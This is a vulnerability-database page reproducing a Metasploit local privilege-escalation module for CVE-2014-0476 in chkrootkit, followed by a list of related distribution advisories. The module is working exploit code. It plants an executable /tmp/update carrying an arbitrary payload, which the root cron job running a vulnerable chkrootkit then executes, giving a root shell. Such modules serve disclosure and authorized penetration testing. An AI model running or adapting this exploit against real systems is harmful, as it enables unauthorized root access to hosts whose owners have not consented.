Lucene search
Thomas StangnerPACKETSTORM:134484HistoryNov 20, 2015 - 12:00 a.m.
Chkrootkit Local Privilege Escalation
2015-11-2000:00:00
Thomas Stangner
packetstormsecurity.com
25
0.001 Low
EPSS
Percentile
38.1%
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privsec.
WfsDelay is set to 24h, since this is how often a chkrootkit
scan is scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['CWE', '20'],
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => 'Jun 04 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
))
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end
`
Related
nessus
nessus
Mandriva Linux Security Advisory : chkrootkit (MDVSA-2014:122)
2014-06-12 00:00:00
GLSA-201709-05 : chkrootkit: Local privilege escalation
2017-09-18 00:00:00
Fedora 19 : chkrootkit-0.49-9.fc19 (2014-7090)
2014-06-13 00:00:00
securityvulns
securityvulns
chkrootkit privilege escalation
2014-06-09 00:00:00
[oss-security] CVE-2014-0476 chkrootkit vulnerability
2014-06-09 00:00:00
prion
prion
Input validation
2014-10-25 22:55:00
ubuntucve
ubuntucve
CVE-2014-0476
2014-06-04 00:00:00
zdt
zdt
Chkrootkit Local Privilege Escalation Exploit
2015-11-20 00:00:00
chkrootkit 0.49 - Local Root Vulnerability
2014-06-28 00:00:00
debian
debian
[SECURITY] [DSA 2945-1] chkrootkit security update
2014-06-03 21:37:45
[SECURITY] [DSA 2945-1] chkrootkit security update
2014-06-03 21:37:14
chkrootkit LTS security update
2014-06-04 10:42:00
openvas
openvas
Debian: Security Advisory (DSA-2945-1)
2014-06-02 00:00:00
Fedora Update for chkrootkit FEDORA-2014-7090
2014-06-17 00:00:00
Ubuntu: Security Advisory (USN-2230-1)
2014-06-09 00:00:00
amazon
amazon
Important: chkrootkit
2014-07-09 16:36:00
cve
cve
CVE-2014-0476
2014-10-25 22:55:00
fedora
fedora
[SECURITY] Fedora 20 Update: chkrootkit-0.49-9.fc20
2014-06-13 05:26:35
[SECURITY] Fedora 19 Update: chkrootkit-0.49-9.fc19
2014-06-13 05:30:39
debiancve
debiancve
CVE-2014-0476
2014-10-25 22:55:00
gentoo
gentoo
chkrootkit: Local privilege escalation
2017-09-17 00:00:00
cvelist
cvelist
CVE-2014-0476
2014-10-25 22:00:00
osv
osv
chkrootkit - security update
2014-06-03 00:00:00
ubuntu
ubuntu
chkrootkit vulnerability
2014-06-04 00:00:00
mageia
mageia
Updated chkrootkit packages fix CVE-2014-0476 and a false positive
2014-06-05 00:44:17
thn
thn
Linux Kernel Vulnerable to Privilege Escalation and DoS Attack
2014-06-07 00:29:00